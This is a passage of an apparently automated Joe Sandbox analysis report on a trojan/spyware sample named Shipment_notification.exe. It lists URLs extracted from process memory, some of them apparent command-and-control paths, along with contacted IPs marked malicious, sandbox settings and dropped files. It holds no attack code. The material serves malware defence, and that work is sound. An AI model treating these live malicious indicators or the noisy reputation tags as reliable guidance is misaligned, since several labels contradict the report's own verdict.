                                          http://www.amirah.cfdexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          https://search.yahoo.com?fr=crmas_sfpfcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                            		high
                                            http://www.tiro.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikUcontrol.exe, 00000004.00000002.582622308.0000000005388000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              http://www.drkathleensanders.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goodfont.co.krShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.notebook-rucksack.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.amirah.cfd/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.sajatypeworks.comShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.typography.netDShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.google.comcontrol.exe, 00000004.00000002.583265968.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000004.00000002.582622308.000000000583E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/cTheShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmShipment_notification.exe, 00000000.00000003.322681699.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322630345.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322651512.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322604070.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322780036.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://fontfabrik.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.notebook-rucksack.com/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rubyidentity.space/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.founder.com.cn/cn/bShipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleaseShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.isabellagambitta.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fonts.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.locationsbormes.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.searchvity.com/?dn=control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmptrue
                                                  • URL Reputation: malware
                                                  		unknown
                                                  http://www.rubyidentity.spaceexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.kaj8tfjcmkn7.xyz/rs5b/Qexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.carterandcone.como.Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sakkal.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zzxiaoyuan.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.carcosainvest.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.notebook-rucksack.com/rs5b/%explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sajatypeworks.com.YShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.339413260.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.577680371.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comShipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.starauctioneerspro.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icocontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                          		high
                                                          http://www.kaj8tfjcmkn7.xyzexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cnvShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cnxShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cni9Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.kaj8tfjcmkn7.xyz/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sajatypeworks.comzShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.tcatelier.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.emagrecarapido.store/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=10W12dX.4.drfalse
                                                            		high
                                                            http://www.zhongyicts.com.cnoShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.piergitarshoes.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                              		high
                                                              http://www.fontbureau.comzanaShipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                                		high
                                                                http://www.carterandcone.comnShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.tcatelier.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ywtxsm.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=10W12dX.4.drfalse
                                                                  		high
                                                                  https://search.yahoo.com?fr=crmas_sfpcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.isabellagambitta.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      http://www.53876.worldexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.founder.com.cn/cnShipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316084822.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315510968.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.320065711.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.com/designers/cabarga.htmlPShipment_notification.exe, 00000000.00000003.320681722.0000000005578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.carterandcone.comxShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.searchvity.com/control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmptrue
                                                                          • URL Reputation: malware
                                                                          		unknown
                                                                          http://www.jiyu-kobo.co.jp/Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.zhongyicts.com.cno.Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.fontbureau.com/designers8Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.53876.world/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.peramid.xyzexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=10W12dX.4.drfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              198.177.124.57
                                                                              		www.peramid.xyzUnited States
                                                                              		395681FINALFRONTIERVGtrue
                                                                              206.54.190.30
                                                                              		carcosainvest.comUnited States
                                                                              		40824WZCOM-UStrue
                                                                              154.218.155.8
                                                                              		www.ywtxsm.comSeychelles
                                                                              		62468VPSQUANUStrue
                                                                              185.27.134.217
                                                                              		www.isabellagambitta.comUnited Kingdom
                                                                              		34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                                              66.96.161.158
                                                                              		www.drkathleensanders.comUnited States
                                                                              		29873BIZLAND-SDUStrue
                                                                              199.59.243.223
                                                                              		www.piergitarshoes.comUnited States
                                                                              		395082BODIS-NJUStrue
                                                                              45.114.105.2
                                                                              		www.locationsbormes.comChina
                                                                              		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue

                                                                              General Information

                                                                              Joe Sandbox Version:37.0.0 Beryl
                                                                              Analysis ID:830738
                                                                              Start date and time:2023-03-20 16:47:46 +01:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 12m 7s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:light
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:7
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample file name:Shipment_notification.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@10/3@12/7
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 66.3% (good quality ratio 58.6%)
                                                                              • Quality average: 70.8%
                                                                              • Quality standard deviation: 33.1%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                              • TCP Packets have been reduced to 100
                                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              16:48:55API Interceptor1x Sleep call for process: Shipment_notification.exe modified
                                                                              16:49:00API Interceptor838x Sleep call for process: explorer.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              No context

                                                                              ASNs

                                                                              No context

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment_notification.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.355304211458859
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                              C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):984
                                                                              Entropy (8bit):5.2414849034866355
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                                                                              MD5:4816271302882BDFB06EE40F624169D1
                                                                              SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                                                                              SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                                                                              SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}

                                                                              C:\Users\user\AppData\Local\Temp\10W12dX

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\control.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):94208
                                                                              Entropy (8bit):1.287139506398081
                                                                              Encrypted:false
